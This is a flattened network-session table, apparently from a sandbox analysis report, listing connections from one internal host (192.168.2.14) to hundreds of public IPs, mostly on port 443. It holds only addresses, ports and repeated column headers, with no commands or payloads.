                                              10433192.168.2.1445210160.2.5.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10434192.168.2.1458410182.181.234.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10435192.168.2.144713064.248.110.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10436192.168.2.144364875.51.99.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10437192.168.2.1444810137.201.40.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10438192.168.2.144683234.151.64.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10439192.168.2.144377489.91.99.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10440192.168.2.145598464.25.186.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10441192.168.2.145999267.17.212.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10442192.168.2.145465650.189.48.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10443192.168.2.1447128181.33.4.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10444192.168.2.1454512149.98.175.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10445192.168.2.145935272.170.44.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10446192.168.2.1434276112.66.251.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10447192.168.2.14342525.135.200.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10448192.168.2.143880241.188.46.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10449192.168.2.1454844101.46.125.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10450192.168.2.143869278.92.218.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10451192.168.2.14554861.32.230.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10452192.168.2.1434038223.115.26.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10453192.168.2.1438026123.50.91.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10454192.168.2.1436342166.78.241.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10455192.168.2.1444338148.232.50.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10456192.168.2.1452204169.251.123.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10457192.168.2.1434556183.41.200.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10458192.168.2.1437056212.246.2.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10459192.168.2.143931886.196.127.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10460192.168.2.1441450160.55.8.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10461192.168.2.1452618128.169.145.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10462192.168.2.144834271.67.168.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10463192.168.2.1447042150.244.227.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10464192.168.2.143710878.35.0.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10465192.168.2.145170281.250.211.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10466192.168.2.144631667.216.21.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10467192.168.2.145618470.234.61.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10468192.168.2.1455414175.224.173.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10469192.168.2.144064035.168.186.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10470192.168.2.1436128126.33.224.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10471192.168.2.1436164166.214.48.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10472192.168.2.143287687.99.210.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10473192.168.2.1456502188.44.16.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10474192.168.2.1441072150.216.92.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10475192.168.2.145587648.101.242.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10476192.168.2.1454794132.188.179.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10477192.168.2.1455560157.16.90.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10478192.168.2.1459166154.252.164.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10479192.168.2.1445166126.222.196.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10480192.168.2.1444178170.108.189.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10481192.168.2.144856444.32.211.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10482192.168.2.1449894221.2.149.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10483192.168.2.1456104117.187.86.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10484192.168.2.1443420150.180.108.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10485192.168.2.145346469.87.104.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10486192.168.2.1443804122.1.36.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10487192.168.2.14545421.168.129.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10488192.168.2.1438576152.235.52.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10489192.168.2.1439380160.108.37.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10490192.168.2.144388631.138.248.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10491192.168.2.144704225.247.136.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10492192.168.2.1452832150.163.109.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10493192.168.2.143874037.16.32.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10494192.168.2.145932263.12.167.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10495192.168.2.1441804195.68.159.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10496192.168.2.1451250146.156.178.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10497192.168.2.144657272.123.154.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10498192.168.2.1455474106.93.219.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10499192.168.2.143493463.162.149.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10500192.168.2.143329860.97.164.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10501192.168.2.145923070.208.254.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10502192.168.2.1455468211.146.13.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10503192.168.2.145986846.219.207.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10504192.168.2.1459156102.165.227.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10505192.168.2.1446658140.139.176.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10506192.168.2.143689861.121.214.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10507192.168.2.145931294.71.177.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10508192.168.2.143861027.23.125.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10509192.168.2.1458748217.174.187.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10510192.168.2.145595449.1.193.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10511192.168.2.1442952104.234.220.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10512192.168.2.1433360223.234.191.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10513192.168.2.1446466201.1.64.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10514192.168.2.145145417.184.140.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10515192.168.2.1450732170.152.23.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10516192.168.2.1433764159.173.120.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10517192.168.2.145547219.188.37.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10518192.168.2.144294074.70.78.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10519192.168.2.14356649.186.250.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10520192.168.2.144819691.192.124.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10521192.168.2.1446016212.205.89.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10522192.168.2.1437360147.248.249.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10523192.168.2.1456210156.220.49.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10524192.168.2.1455858195.170.106.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10525192.168.2.144896688.37.22.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10526192.168.2.1447080207.10.251.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10527192.168.2.144742094.68.110.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10528192.168.2.1447882171.124.116.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10529192.168.2.144772834.71.230.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10530192.168.2.145766077.200.48.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10531192.168.2.1446214144.126.143.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10532192.168.2.144021679.151.180.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10533192.168.2.1454068219.143.255.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10534192.168.2.1446970102.55.144.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10535192.168.2.1451758216.201.153.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10536192.168.2.1452356209.128.84.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10537192.168.2.1450358201.253.193.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10538192.168.2.1444494102.198.216.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10539192.168.2.1441706200.222.166.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10540192.168.2.143776845.197.183.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10541192.168.2.1441168132.190.99.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10542192.168.2.1440202100.231.95.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10543192.168.2.1434804123.243.89.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10544192.168.2.1449300186.187.159.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10545192.168.2.1445486175.24.241.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10546192.168.2.1453132154.148.152.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10547192.168.2.143592476.175.110.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10548192.168.2.1445130196.228.207.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10549192.168.2.1452550213.91.36.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10550192.168.2.1457882144.161.94.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10551192.168.2.144809823.156.142.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10552192.168.2.1436328101.9.96.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10553192.168.2.1434956208.54.90.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10554192.168.2.1451626133.18.248.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10555192.168.2.1454882204.15.250.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10556192.168.2.1441448156.242.31.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10557192.168.2.1439792222.8.200.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10558192.168.2.1434896189.174.96.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10559192.168.2.1451036139.87.132.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10560192.168.2.144805484.249.74.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10561192.168.2.14443929.83.183.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10562192.168.2.1432870202.211.97.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10563192.168.2.145726280.183.244.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10564192.168.2.1459588211.34.159.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10565192.168.2.1438776193.50.161.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10566192.168.2.143708812.179.26.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10567192.168.2.1443616123.77.248.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10568192.168.2.1435710204.66.133.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10569192.168.2.1436938113.126.130.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10570192.168.2.1456836206.45.203.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10571192.168.2.1450124186.126.147.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10572192.168.2.144902040.184.12.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10573192.168.2.143688814.34.83.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10574192.168.2.145661682.56.107.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10575192.168.2.145557090.248.251.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10576192.168.2.145167490.156.15.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10577192.168.2.1454278174.170.216.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10578192.168.2.1446388112.252.239.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10579192.168.2.1445616124.242.175.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10580192.168.2.1433996188.24.132.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10581192.168.2.145050886.6.34.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10582192.168.2.143927669.194.72.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10583192.168.2.1437748134.112.97.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10584192.168.2.1452282172.65.94.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10585192.168.2.1451648197.32.126.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10586192.168.2.1435564123.99.44.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10587192.168.2.1448690185.100.92.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10588192.168.2.1453460195.244.215.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10589192.168.2.1443546205.14.31.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10590192.168.2.1438430171.191.66.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10591192.168.2.1459266134.180.22.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10592192.168.2.1440870191.109.7.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10593192.168.2.145889453.211.56.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10594192.168.2.145229445.39.179.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10595192.168.2.145765681.211.98.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10596192.168.2.144046278.83.132.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10597192.168.2.144992861.57.74.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10598192.168.2.1453650154.7.75.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10599192.168.2.1459692170.77.28.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10600192.168.2.1458158148.218.229.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10601192.168.2.1445174171.127.161.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10602192.168.2.1442894212.195.220.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10603192.168.2.1442254165.41.251.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10604192.168.2.1455042112.11.245.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10605192.168.2.144238634.163.220.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10606192.168.2.1435196122.210.21.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10607192.168.2.145337242.64.151.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10608192.168.2.1446088119.72.189.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10609192.168.2.145304031.112.214.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10610192.168.2.1441894212.83.240.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10611192.168.2.1436652140.40.9.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10612192.168.2.1448064211.81.250.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10613192.168.2.145718695.235.99.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10614192.168.2.1436384143.109.172.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10615192.168.2.145090443.42.179.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10616192.168.2.145629438.30.2.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10617192.168.2.145865298.178.88.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10618192.168.2.143802631.169.0.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10619192.168.2.144296841.8.99.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10620192.168.2.144464212.140.66.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10621192.168.2.1457138125.228.235.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10622192.168.2.1433846168.165.78.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10623192.168.2.144614492.112.138.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10624192.168.2.143565653.48.143.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10625192.168.2.145131893.160.85.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10626192.168.2.1451644180.115.154.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10627192.168.2.1447570126.192.178.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10628192.168.2.1443572169.14.172.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10629192.168.2.144742896.142.200.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10630192.168.2.144357625.68.3.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10631192.168.2.145937489.247.213.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10632192.168.2.1440960196.180.117.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10633192.168.2.1455998124.174.191.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10634192.168.2.1455916149.208.202.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10635192.168.2.1446988115.207.234.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10636192.168.2.1456960168.128.48.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10637192.168.2.1436122191.43.248.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10638192.168.2.1455572222.244.98.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10639192.168.2.1451674167.198.1.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10640192.168.2.1448954167.90.24.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10641192.168.2.1440516206.121.35.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10642192.168.2.145245672.247.252.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10643192.168.2.144004096.132.43.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10644192.168.2.1439014110.40.55.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10645192.168.2.143377032.59.74.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10646192.168.2.1439492213.35.47.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10647192.168.2.1448010200.54.87.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10648192.168.2.144215894.40.3.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10649192.168.2.1458186218.123.132.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10650192.168.2.144049089.184.61.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10651192.168.2.1435810146.16.215.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10652192.168.2.1437672191.210.252.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10653192.168.2.1444668114.61.220.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10654192.168.2.1459998163.230.179.237443
                                              TimestampBytes transferredDirectionData


